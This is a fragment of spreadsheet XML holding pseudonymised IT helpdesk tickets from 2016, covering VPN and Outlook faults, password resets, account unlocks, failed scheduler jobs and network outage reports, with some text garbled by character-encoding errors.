    <t xml:space="preserve">_x000D_
_x000D_
received from: yjwivxsh.fcetobrj@gmail.com_x000D_
_x000D_
dear it team._x000D_
_x000D_
my skype not work._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>yjwivxsh fcetobrj</t>
  </si>
  <si>
    <t>no vpn access - pls help</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: luagmhds.iymwcelx@gmail.com
hi helpdesk,
when trying to access vpn, following message appears.
i am unable to get in by clicking "click here"â€¦.
pls help because i am doing ppm reviews from outside company office with my team today and need access to data from company foldersâ€¦.
thx.
[cid:image001.png@01d222c8.e67ad960]
micheyi gyhus
vice president
luagmhds.iymwcelx@gmail.com&lt;mailto:luagmhds.iymwcelx@gmail.com&gt;
company inc. | www.company.com&lt;
</t>
  </si>
  <si>
    <t>luagmhds iymwcelx</t>
  </si>
  <si>
    <t>germany can't connect using vpn (f5 networks)</t>
  </si>
  <si>
    <t xml:space="preserve">phone  email iewnguxv.bufwxeiy@gmail.com
germany can't connect to the local network using the f5-vpn connection.
it worked until saturday, sunday morning we got just the screen ' your logoff was successfully' 
i called the phone support, he fixed this,
but now, after logon we can't reach  erp and the servers in our plant..
ping failed.
please fix this, our external employees can not work.
</t>
  </si>
  <si>
    <t>iewnguxv bufwxeiy</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1148 failed in job_scheduler at: 10/10/2016 01:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1148 failed in job_scheduler at: 10/10/2016 01:15:00</t>
  </si>
  <si>
    <t>cant connect to the network.mobile hot spot also not connecting.telecom_vendor_3 4g</t>
  </si>
  <si>
    <t>cant connect to the network.mobile hot spot also not connecting..telecom_vendor_3 4g
-hecked the network connection  settings.
-restarted the system.tried to connect.getting limited 
ph:</t>
  </si>
  <si>
    <t>EU_tool, chargenverwaltung, pdv</t>
  </si>
  <si>
    <t xml:space="preserve">die systeme EU_tool, chargenverwaltung, pdv laufen absolut schlecht._x000D_
man kann mit ihnen so" nicht" wirklich arbeiten._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>server HostName_1233 was down</t>
  </si>
  <si>
    <t>c:\users\virakv&gt;ping HostName_1233.company.company.com_x000D_
_x000D_
pinging HostName_1233.company.company.com [61.01.52.0260] with 32 bytes of data:_x000D_
request timed out._x000D_
request timed out._x000D_
request timed out._x000D_
request timed out._x000D_
_x000D_
ping statistics for 61.01.52.0260:_x000D_
    packets: sent = 4, received = 0, lost = 4 (100% loss),</t>
  </si>
  <si>
    <t>unable to generate sto as per purrqs 4121889522/00001</t>
  </si>
  <si>
    <t xml:space="preserve">unable to generate sto as per purrqs 4121889522/00001 , please find the error message as attached file.  please help fixing this issue aerp._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1141 failed in job_scheduler at: 10/09/2016 23:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1141 failed in job_scheduler at: 10/09/2016 23:45:00</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ygkzwsud.cvjgkxws@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
my vpn page is not responding, unable to connect._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cannot start outlook email</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ynsqjehx.kqgrsawl@gmail.com_x000D_
_x000D_
hi it team,_x000D_
_x000D_
_x000D_
since yesterday my laptop was unable to start outlook mail. i could only use web mail now._x000D_
_x000D_
any assistance to resolve this is appreciated._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 10/09/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 10/09/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 10/09/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 10/09/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 10/09/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 10/09/2016 23:00:00</t>
  </si>
  <si>
    <t>laptop cannot connect companysecure wifi network.</t>
  </si>
  <si>
    <t>mqbxwpfn uclrqfxa</t>
  </si>
  <si>
    <t>server HostName_1274 is not reachable</t>
  </si>
  <si>
    <t xml:space="preserve">c:\users\virakv&gt;ping HostName_1274_x000D_
_x000D_
pinging HostName_1274.company.company.com [82.02.04.7140] with 32 bytes of data:_x000D_
request timed out._x000D_
request timed out._x000D_
request timed out._x000D_
request timed out._x000D_
_x000D_
ping statistics for 82.02.04.7140:_x000D_
    packets: sent = 4, received = 0, lost = 4 (100% loss),_x000D_
</t>
  </si>
  <si>
    <t>tkbuhcnq kdheauqo</t>
  </si>
  <si>
    <t>please help for vpn connection, try to contacted but can't!</t>
  </si>
  <si>
    <t>name:wanayht
language:
browser:microsoft internet explorer
email:xztveoqs.zyrnqiav@gmail.com
customer number:
telephone:
summary:please help for vpn connection, try to contacted but can't!</t>
  </si>
  <si>
    <t>xztveoqs zyrnqiav</t>
  </si>
  <si>
    <t>dell:7350: laptop will not stay connected to the internet.</t>
  </si>
  <si>
    <t>name:stgyott gdhdyrham
language:
browser:microsoft internet explorer
email:stgyott.gdhdyrham@company.com
customer number:
telephone:+6sartlgeo lhqksbd
summary:hi i have a dell latitude 7350 which i use from home office &amp; remotely. laptop will not stay connected to the internet. can you assist please?</t>
  </si>
  <si>
    <t>kizybvpj hisaobfx</t>
  </si>
  <si>
    <t>msd crm--outlook ä¸€ç›´æ˜¾ç¤ºæ­£åœ¨å¯åŠ¨ï¼Œä¸èƒ½è¿›å…¥æ­£å¸¸ç•Œé¢ã€‚</t>
  </si>
  <si>
    <t>please provide details of the issue._x000D_
outlook ä¸€ç›´æ˜¾ç¤ºæ­£åœ¨å¯åŠ¨ï¼Œä¸èƒ½è¿›å…¥æ­£å¸¸ç•Œé¢ã€‚</t>
  </si>
  <si>
    <t>loesgbfh tknsuhvw</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 password </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zuxcfonv.nyhpkrbe@gmail.com_x000D_
_x000D_
gso ,_x000D_
_x000D_
please reset password for hanx123 , </t>
  </si>
  <si>
    <t>hpqc installation</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: elixsfvu.pxwbjofl@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
i'm trying to install hpqc for travel_tool uacyltoe hxgayczeing with my windows user name and password but have the following error message._x000D_
_x000D_
[cid:image001.png@01d222cf.33a9b3e0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>elixsfvu pxwbjofl</t>
  </si>
  <si>
    <t>vpn not working for rjeyfxlg ltfskygw</t>
  </si>
  <si>
    <t xml:space="preserve">219581173[â€Ž10/â€Ž10/â€Ž2016 5:01 am] lzspyjki smdbqnef: 
ok
[â€Ž10/â€Ž10/â€Ž2016 5:02 am] lzspyjki smdbqnef: 
bring up notepad
her name is oyunatye
[â€Ž10/â€Ž10/â€Ž2016 5:03 am] 
</t>
  </si>
  <si>
    <t>lzspyjki smdbqnef</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1306 failed in job_scheduler at: 10/09/2016 18:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1306 failed in job_scheduler at: 10/09/2016 18:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_461 failed in job_scheduler at: 10/09/2016 17:41:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_461 failed in job_scheduler at: 10/09/2016 17:41:00</t>
  </si>
  <si>
    <t>node HostName_1195 located at usa is down since 10/9/2016 10:32 am</t>
  </si>
  <si>
    <t>node HostName_1195 located at usa is down since 10/9/2016 10:32 am._x000D_
_x000D_
node down due to the power flap._x000D_
check with the site admin during the business hours on monday.</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1238:application plm - dsc file on node HostName_1238 is unreachable" </t>
  </si>
  <si>
    <t xml:space="preserve">HostName_521:application plm conversion server on node HostName_521 is warning" action </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1393 failed in job_scheduler at: 10/09/2016 10:55:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1393 failed in job_scheduler at: 10/09/2016 10:55:00</t>
  </si>
  <si>
    <t xml:space="preserve">resetting of erp password </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ngjztqai.xqjzpvru@gmail.com_x000D_
_x000D_
hi ,_x000D_
_x000D_
request you to reset  my  erp password._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>xgjkafcn uijphdyx</t>
  </si>
  <si>
    <t>dpozkmie vjuybcwz 27367 erp account locked</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: boithdfa.tojwnydh@gmail.com_x000D_
_x000D_
please unlock account._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>boithdfa tojwnydh</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 10/09/2016 09:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 10/09/2016 09:38:00</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_1_regen failed in job_scheduler at: 10/09/2016 08:51:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_1_regen failed in job_scheduler at: 10/09/2016 08:51:00</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_977 :application tax_interface proc counts on node HostName_977 is critical" </t>
  </si>
  <si>
    <t xml:space="preserve"> the tax_interface webpage is reporting a : down status on, HostName_977. _x000D_
application tax_interface proc counts on node HostName_977 is critical" _x000D_
 application tax_interface prod app server on node HostName_977 is dow</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3051 failed in job_scheduler at: 10/09/2016 05:40:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3051 failed in job_scheduler at: 10/09/2016 05:40:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3049 failed in job_scheduler at: 10/09/2016 05:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3049 failed in job_scheduler at: 10/09/2016 05:30:00</t>
  </si>
  <si>
    <t>unable to create customers in engineering tool</t>
  </si>
  <si>
    <t>name : ilhcgoqf xlibynvc
email : ilhcgoqf.xlibynvc@gmail.com
telephone : 
summary : hello, i have problems with my engineering_tools. it is impossible to create a new customer.</t>
  </si>
  <si>
    <t>ilhcgoqf xlibynvc</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3343 failed in job_scheduler at: 10/09/2016 04:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3343 failed in job_scheduler at: 10/09/2016 04:30:00</t>
  </si>
  <si>
    <t>ç¬”è®°æœ¬é‡æ–°è£…ä¸‹ç³»ç»Ÿ</t>
  </si>
  <si>
    <t>æŠŠæˆ‘çš„ç¬”è®°æœ¬é‡æ–°è£…ä¸‹ç³»ç»Ÿ</t>
  </si>
  <si>
    <t>xjvubmlq vyamhjip</t>
  </si>
  <si>
    <t>æœ‰ä¸€ä¸ªé“¾æŽ¥æ–‡ä»¶æ‰“ä¸å¼€</t>
  </si>
  <si>
    <t>æœ‰ä¸€é“¾æŽ¥æ–‡ä»¶æ‰“ä¸å¼€ï¼Œæç¤ºç‰ˆæœ¬ä½Ž</t>
  </si>
  <si>
    <t>qsfcxzel quwykhno</t>
  </si>
  <si>
    <t>EU_tool - worklist is not available, confirmation is also not possible.</t>
  </si>
  <si>
    <t>the last worklist was created on friday, october 8th at 3:50 am.</t>
  </si>
  <si>
    <t>frzjtmyk wzacvhki</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3343 failed in job_scheduler at: 10/09/2016 02:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3343 failed in job_scheduler at: 10/09/2016 02:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3051 failed in job_scheduler at: 10/09/2016 01:08:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3051 failed in job_scheduler at: 10/09/2016 01:08:00</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_keheu1 failed in job_scheduler at: 10/09/2016 00:37:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_keheu1 failed in job_scheduler at: 10/09/2016 00:37:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3049 failed in job_scheduler at: 10/09/2016 00:35:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3049 failed in job_scheduler at: 10/09/2016 00:35:00</t>
  </si>
  <si>
    <t xml:space="preserve">job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 10/09/2016 00:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 10/09/2016 00:20:00</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/09/2016 00:16:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/09/2016 00:16:00</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap2 failed in job_scheduler at: 10/09/2016 00:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap2 failed in job_scheduler at: 10/09/2016 00:03:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_452 failed in job_scheduler at: 10/08/2016 21:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
10/8/2016 9:38:53 pm :: unable to allocate processing resources. error: all backup proxies are offline or outdated _x000D_
_x000D_
_x000D_
job Job_452 failed in job_scheduler at: 10/08/2016 21:39:00</t>
  </si>
  <si>
    <t>customer accounts contact  list are not populating in crm dynamics</t>
  </si>
  <si>
    <t xml:space="preserve">hello,
the issue: contacts that have been designated to track in crm are not showing up in crm and i'm not sure why. see the screen shots below
biyhll kthyarg
sales engineer - wc1 team
smhepfdn.aypgzieh@gmail.com
</t>
  </si>
  <si>
    <t>password resset request</t>
  </si>
  <si>
    <t xml:space="preserve">from: rakthyesh ramdntythanjesh 
sent: sunday, october 09, 2016 4:41 am
to: kzishqfu bmdawzoi
cc: tiyhum kuyiomar
subject: re: request to reset microsoft online services password for hgudmrta.vidzoqfl@gmail.com
dear dene,
â€¢ accounts status is  unlocked for user hgudmrta.vidzoqfl@gmail.com 
please note the following url using which you can unlock all accounts and setup one single password for access across all systems from any other pc connected to the company network.
for a step by step guide on how to use this site, click on the following link
let me know if you need more information or assistance on this matheywter.
kind </t>
  </si>
  <si>
    <t>hgudmrta vidzoqfl</t>
  </si>
  <si>
    <t>password reset    request</t>
  </si>
  <si>
    <t>distributor_tool npr error code</t>
  </si>
  <si>
    <t xml:space="preserve">email screen shot of error.  duane said "remember seeing a similar error during uacyltoe hxgayczeing that we resolved which had to do with the customer master. i think it had to do with a uacyltoe hxgaycze request and using the actual customer rather than the requester as the t&amp;d customer."_x000D_
_x000D_
this npr is for a quote &amp; not a t&amp;d order._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_powder_prod_full failed in job_scheduler at: 10/08/2016 18:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_powder_prod_full failed in job_scheduler at: 10/08/2016 18:36:00</t>
  </si>
  <si>
    <t xml:space="preserve">ic_x000D_
 welcome, our next available agent will be with you shortly..._x000D_
 interaction alerting agent._x000D_
 website visitor has joined the conversation_x000D_
rakthyesh ramdntythanjesh_x000D_
 hi ramdntythanjesh_x000D_
ramdntythanjesh_x000D_
 hi rakthyesh_x000D_
rakthyesh ramdntythanjesh_x000D_
 </t>
  </si>
  <si>
    <t>trixslny mbwishyo</t>
  </si>
  <si>
    <t>HostName_1015:volume: c:\ is over 85% space consumed. space available: 4.7 g</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_480 failed in job_scheduler at: 10/08/2016 13:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_480 failed in job_scheduler at: 10/08/2016 13:38:00</t>
  </si>
  <si>
    <t xml:space="preserve">tax rate   mismatch  </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ikerxqwz.prkyuitl@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
during the ongoing   internal audit  conducted by e&amp;y  , it was  observed that in list of   inwarehouse_tools attached , tax rate  was different from the one  updated  in the product hierarchy_x000D_
_x000D_
request you to look into the reason  for few samples  and identify reasons   why incorrect  tax rate was captured  in inwarehouse_tool tax  and not as per product hierarchy ._x000D_
_x000D_
also let us know whether   it   was system error ._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_484 failed in job_scheduler at: 10/08/2016 12:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_484 failed in job_scheduler at: 10/08/2016 12:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">from: ftnijxup sbltduco _x000D_
sent: saturday, october 08, 2016 8:29 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: wg: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird._x000D_
_x000D_
help desk,_x000D_
please take my new iphone 6s out of quarantine._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp locked - please reset for nabjwvtd sprhouiv 27388</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: boithdfa.tojwnydh@gmail.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to see emails which are older than 30 days</t>
  </si>
  <si>
    <t xml:space="preserve">network outage: india, in- orelikon balzers coating india limited site is hard down since 7:42 am at 10/ 8 et </t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____7:42 am at 10/ 8 et __________________x000D_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____no____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</si>
  <si>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blank call // gso // loud noise</t>
  </si>
  <si>
    <t>telephone repair  pu-4 (shop floor 173 connection)</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: segvwfyn.mogtrevn@gmail.com
dear sir
request you to depute telephone  repair  person to pu-4 shop floor (173  shop floor connection)  as it not workingâ€¦.
segvwfyn mogtrevn
assistant manager- manufacturing
segvwfyn.mogtrevn@gmail.com&lt;mailto:yuxloigj.tzfwjxhe@gmail.com&gt;
[cid:image009.jpg@01SID_35d8e.07ce5550]
</t>
  </si>
  <si>
    <t>segvwfyn mogtrevn</t>
  </si>
  <si>
    <t xml:space="preserve">from: ftnijxup sbltduco _x000D_
sent: saturday, october 08, 2016 2:23 pm_x000D_
to: qaohugxw kdeqjncw; nwfodmhc exurcwkm_x000D_
subject: re: my access to supply_chain_software is blocked _x000D_
_x000D_
_x000D_
help desk,_x000D_
please check pathuick's account in supply_chain_software. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">supply_chain_software password reset
from: ftnijxup sbltduco 
sent: saturday, october 08, 2016 2:21 pm
to: thsyrley shi; nwfodmhc exurcwkm
subject: re: ç­”å¤: finished: start of s&amp;op process
help desk,
please check thsyrley's account in supply_chain_software and assist for sign-on. 
</t>
  </si>
  <si>
    <t>qbzlfeva fmxwqugs</t>
  </si>
  <si>
    <t>usa plant - company-na-usa-usa-plant-bld1-qa-carb-2960-01-access-sw01 switch is down since 4:53am et on 10/08/16</t>
  </si>
  <si>
    <t>reset passwords for jvpkulxw ovuweygj using password_management_tool password reset.</t>
  </si>
  <si>
    <t>account got locked</t>
  </si>
  <si>
    <t>send e-mail from engineering tool doesn't work anymore</t>
  </si>
  <si>
    <t>since feb / march 2016 it's not possible to send e-mail for the user details dialog anymore (e-mail address). it used to work before._x000D_
that function is very helpful for the end user to contact the designer on issues/question directly from engineering tool without leaving engineering tool._x000D_
see attachments (dialog and error message)</t>
  </si>
  <si>
    <t>tghrloks jbgcvlmf</t>
  </si>
  <si>
    <t>ms outlook2013 ä¸€ç›´æ˜¾ç¤ºæ­£åœ¨å¯åŠ¨ï¼Œä¸èƒ½æ˜¾ç¤ºæ­£å¸¸ç•Œé¢</t>
  </si>
  <si>
    <t>please provide details of the issue._x000D_
ms outlook2013 ä¸€ç›´æ˜¾ç¤ºæ­£åœ¨å¯åŠ¨ï¼Œä¸èƒ½æ˜¾ç¤ºæ­£å¸¸ç•Œé¢</t>
  </si>
  <si>
    <t>molihtdq auprogsj</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2080 failed in job_scheduler at: 10/08/2016 02:24:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2080 failed in job_scheduler at: 10/08/2016 02:24:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2039 failed in job_scheduler at: 10/08/2016 02:22:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2039 failed in job_scheduler at: 10/08/2016 02:22:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2074 failed in job_scheduler at: 10/08/2016 02:07:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2074 failed in job_scheduler at: 10/08/2016 02:07:00</t>
  </si>
  <si>
    <t>unable to do kis for dn 8058280136</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gjtyswkb.dpvaymxr@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
pls help to check dn 9169391247, we unable to do kis for this dn, </t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_reporting_tool_prod_full failed in job_scheduler at: 10/08/2016 01:12:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_reporting_tool_prod_full failed in job_scheduler at: 10/08/2016 01:12:00</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 account </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zuxcfonv.nyhpkrbe@gmail.com
gso
please unlock and reset password for lij8syte ,also send password to jinxyhdi luji ,</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1329 failed in job_scheduler at: 10/08/2016 00:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1329 failed in job_scheduler at: 10/08/2016 00:11:00</t>
  </si>
  <si>
    <t>power outage: engineering_toolkuznetsk warehouse - (company) network is down since 10:52pm et on 10/07/2016</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________10:52pm et on 10/07/2016______________x000D_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___na_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____no_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _____na______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ______no_____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</si>
  <si>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Job_549 failed in job_scheduler at: 10/07/2016 23:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_549 failed in job_scheduler at: 10/07/2016 23:05:00</t>
  </si>
  <si>
    <t xml:space="preserve">account is expired </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zuxcfonv.nyhpkrbe@gmail.com
gso,
the account vvlixthy is expired , could you extend the account date to oct 8 2018 , jacyhky liuhyt is sponsor is jacyhky liuhyt , </t>
  </si>
  <si>
    <t xml:space="preserve">account is locked </t>
  </si>
  <si>
    <t>jofvunqs uwigjmzv</t>
  </si>
  <si>
    <t xml:space="preserve">ç­”å¤: password_management_tool </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: weqocbnu.eoixcpvy@gmail.com
hi  all
please reset my password for SID_78 for my entering error more than 3 times.
user name : caoryhuq
æ—¥å¸¸ä¸šåŠ¡ï¼Œè¯·å‘é€è‡³south.service@company.com&lt;mailto:è¯·å‘é€è‡³south.service@company.com&gt;å…¬å…±é‚®ç®±
best </t>
  </si>
  <si>
    <t>weqocbnu eoixcpvy</t>
  </si>
  <si>
    <t>ç”µè„‘ç™»å½•å¯†ç å¿˜è®°ï¼Œé‡ç½®å¯†ç ã€‚</t>
  </si>
  <si>
    <t>password reset using password_management_tool</t>
  </si>
  <si>
    <t>node usa pbx (10.1.19.200 ) located at usa is down since 7:14 pm et on 10/07.</t>
  </si>
  <si>
    <t>unable to save excel document</t>
  </si>
  <si>
    <t>unable to sync some files in collaboration_platform</t>
  </si>
  <si>
    <t>xpzsygkb vbualmpr</t>
  </si>
  <si>
    <t>ticket update on inplant_867667</t>
  </si>
  <si>
    <t>ticket update on inplant_867672</t>
  </si>
  <si>
    <t>unable to log in to engineering tool</t>
  </si>
  <si>
    <t>blue screen on start up</t>
  </si>
  <si>
    <t>qwijaspo ukynmfig</t>
  </si>
  <si>
    <t>unable to sign in to skype meeting</t>
  </si>
  <si>
    <t>kijgcwlh gfejlcvb</t>
  </si>
  <si>
    <t xml:space="preserve">outlook not opening up: stuck on loading screen </t>
  </si>
  <si>
    <t xml:space="preserve">vpn issue </t>
  </si>
  <si>
    <t xml:space="preserve">
telephone:
summary:i cannot get vpn to connect on my computer.</t>
  </si>
  <si>
    <t>engineering_tool and infopath issue</t>
  </si>
  <si>
    <t>sqlcuhep railgnfb called in for an issue where he was unable to launch engineering_tool and unable to fill up a discount form.</t>
  </si>
  <si>
    <t>sqlcuhep railgnfb</t>
  </si>
  <si>
    <t>unable to view mails more than 3 days</t>
  </si>
  <si>
    <t>jabra headset issue</t>
  </si>
  <si>
    <t xml:space="preserve">i needed a hand setting up jabra pro headset for skype calls. i have installed drivers, just not sure what else needs to be done.
contact # : </t>
  </si>
  <si>
    <t>unlock account  email  in cell phone the user vhjkdqop tkhafgrc id:sanchrtyn</t>
  </si>
  <si>
    <t xml:space="preserve">hello team,
could you please unlock account  email  in cell phone the user vhjkdqop tkhafgrc id: sanchrtyn ?
</t>
  </si>
  <si>
    <t>qhjkxoyw lgiovknd called as he wanted to speak to tiyhum kuyiomar</t>
  </si>
  <si>
    <t>unable to log in to supply_chain_software</t>
  </si>
  <si>
    <t>tgewaniq yepifgbl</t>
  </si>
  <si>
    <t>call from vythytalyst : uploading group of contacts to crm</t>
  </si>
  <si>
    <t>call from vythytalyst : uploading group of contacts to crm issue
contact # : 
while synchronizing contacts from outlook to crm 
1&gt; its not synchronizing complete list of contacts.
2&gt;its moving those contacts from outlook and keeping in crm</t>
  </si>
  <si>
    <t>gxiytpjh yibsguwk</t>
  </si>
  <si>
    <t xml:space="preserve">need this fixed </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: oetlgbfw.bsctrnwp@gmail.com
i don't have access to below
prerequisites:
you must have the infopath filler client to complete and submit the lra form.  please contact the gsc and open a remedy ticket for the pc support group if you do not have the infopath filler client.
to determine if you have the infopath filler client, click on the start button and choose all programdntys.
click on microsoft office group, you should see the microsoft infopath filler client:
dthyan matheywtyuews
sales manager gl2
oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;
</t>
  </si>
  <si>
    <t>unable to open engineering_tool application</t>
  </si>
  <si>
    <t>engineering tool issue</t>
  </si>
  <si>
    <t xml:space="preserve">business_client : .net error message </t>
  </si>
  <si>
    <t>kjeqxayu bpwkdazl</t>
  </si>
  <si>
    <t>unable to enter mileage details. site not loading.</t>
  </si>
  <si>
    <t>unable to enter mileage details</t>
  </si>
  <si>
    <t>rqtmpjdb ohitelsg</t>
  </si>
  <si>
    <t xml:space="preserve">ticketing_tool issue - cannot seem to create a new subtask from the ticketing_tool console. </t>
  </si>
  <si>
    <t xml:space="preserve">ticketing_tool issue - cannot seem to create a new subtask from the ticketing_tool console. the area to create a new sub-task  seems to be missing.  we were asked to create separate tasks for server decommissioning and neither me nor ron mcgee can seem to create a sub-task on a ticket any more. </t>
  </si>
  <si>
    <t>client is having issues with excel crashing</t>
  </si>
  <si>
    <t xml:space="preserve">hpqc uacyltoe hxgaycze installation </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:i need help downloading a uacyltoe hxgaycze application, can someone take over my screen and help me out?</t>
  </si>
  <si>
    <t>hajworze jqpisura</t>
  </si>
  <si>
    <t>subbathykrisyuhnyrt shhuivashankar company provided phone activation</t>
  </si>
  <si>
    <t>ticket update on inplant_867618</t>
